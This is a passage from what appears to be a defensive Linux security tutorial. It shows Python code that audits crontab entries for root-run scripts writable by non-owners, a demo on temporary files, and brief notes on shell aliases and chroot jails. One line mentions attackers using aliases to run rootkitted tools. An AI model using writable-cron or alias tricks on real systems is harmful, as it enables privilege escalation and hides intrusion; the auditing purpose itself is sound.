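        if line.startswith("@"):  # @reboot / @daily shorthand: schedule user command
            parts = line.split(None, 2)
            user_idx, cmd_idx = 1, 2
        else:  # m h dom mon dow user command
            parts = line.split(None, 6)
            user_idx, cmd_idx = 5, 6
        if len(parts) <= cmd_idx:
            continue
        entries.append((parts[user_idx], parts[cmd_idx]))
    return entries


def writable_cron_scripts(cron_lines):
    """Root-run cron commands whose program file can be modified by non-owners."""
    risky = []
    for user, cmd in parse_crontab_lines(cron_lines):
        program = cmd.split()[0]
        try:
            st = os.stat(program)
        except OSError:
            continue  # not an absolute path or not present; nothing to check here
        if user == "root" and st.st_mode & (stat.S_IWOTH | stat.S_IWGRP):
            risky.append((program, user))
    return risky


def run_demo():
    """Build a throwaway tree (constructed data) and audit it; returns the findings."""
    root = tempfile.mkdtemp(prefix="privaudit_")
    safe = os.path.join(root, "backup.sh")
    loose = os.path.join(root, "cleanup.sh")
    for path in (safe, loose):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho demo\n")
    os.chmod(safe, 0o755)   # owner-writable only: fine
    os.chmod(loose, 0o777)  # anyone can edit what root will execute
    cron_lines = [
        "PATH=/usr/bin:/bin",
        "# m h dom mon dow user command",
        "0 3 * * * root %s --full" % safe,
        "*/5 * * * * root %s" % loose,
        "@reboot alice %s" % loose,  # not root, so not an escalation path
    ]
    return {"root": root, "tree": audit_tree(root), "cron": writable_cron_scripts(cron_lines)}


if __name__ == "__main__":
    result = run_demo()
    print("flagged files:", result["tree"])
    print("writable root cron scripts:", result["cron"])
```

A real run would point audit_tree at / (expect the legitimate setuid binaries such as mount and sudo to show up; the job is to diff against a known-good baseline) and feed writable_cron_scripts the contents of /etc/crontab and /etc/cron.d; per-user crontabs lack the user column and would need the five-field variant.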

  • If you always type “ls -al” when listing directory contents, you might make an alias of “ll” or “lal” or even just “ls” for that command and save it to your shell’s config file (usually .profile or .bashrc or similar).  An attacker could also use an alias to trick users into executing rootkitted versions of apps like top or free to hide their activity.
  • Chroot is in every Unix-like distro.  Jail is much stricter and is mostly seen in BSD distributions.